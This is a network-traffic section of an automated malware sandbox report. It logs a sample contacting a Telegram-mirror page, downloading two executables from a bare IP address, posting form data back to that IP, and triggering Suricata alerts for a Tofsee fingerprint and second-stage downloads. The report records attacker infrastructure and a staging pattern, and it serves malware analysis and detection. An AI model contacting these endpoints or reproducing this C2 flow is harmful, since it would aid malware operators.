Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
tttttt.me | 95.216.186.40 |
- UDP Requests
-
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
192.168.56.101:62333 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
https://tttttt.me/hellobroprocreate
REQUEST
RESPONSE
BODY
GET /hellobroprocreate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Host: tttttt.me
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jun 2021 00:02:57 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: stel_ssid=f6ea355efefb0dddf7_3050249015251690126; expires=Sat, 19 Jun 2021 00:02:57 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
Strict-Transport-Security: max-age=35768000
Access-Control-Allow-Origin: *
POST
200
http://34.76.8.115/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: text/plain; charset=UTF-8
Content-Length: 128
Host: 34.76.8.115
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jun 2021 00:02:58 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
GET
200
http://34.76.8.115//l/f/W2VtHHoBuI_ccNKoibAG/a4bf8575ff58234bbfb45ede44543896e556da37
REQUEST
RESPONSE
BODY
GET //l/f/W2VtHHoBuI_ccNKoibAG/a4bf8575ff58234bbfb45ede44543896e556da37 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 34.76.8.115
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jun 2021 00:02:59 GMT
Content-Type: application/octet-stream
Content-Length: 916735
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:17 GMT
ETag: "60257d95-dfcff"
Accept-Ranges: bytes
GET
200
http://34.76.8.115//l/f/W2VtHHoBuI_ccNKoibAG/e077b412e4e9b04043dfc595bae6abb1966ac987
REQUEST
RESPONSE
BODY
GET //l/f/W2VtHHoBuI_ccNKoibAG/e077b412e4e9b04043dfc595bae6abb1966ac987 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: 34.76.8.115
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jun 2021 00:03:03 GMT
Content-Type: application/octet-stream
Content-Length: 2828315
Connection: keep-alive
Last-Modified: Thu, 11 Feb 2021 18:55:16 GMT
ETag: "60257d94-2b281b"
Accept-Ranges: bytes
POST
200
http://34.76.8.115/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV
Content-Length: 867
Host: 34.76.8.115
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Jun 2021 00:03:09 GMT
Content-Type: text/plain;charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49203 -> 95.216.186.40:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 34.76.8.115:80 -> 192.168.56.101:49204 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 34.76.8.115:80 -> 192.168.56.101:49204 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 34.76.8.115:80 -> 192.168.56.101:49204 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49203 95.216.186.40:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=tttttt.me | ff:46:0a:ed:46:1a:92:da:d9:8a:95:d8:4b:c2:3d:51:b8:73:06:13 |
Snort Alerts
No Snort Alerts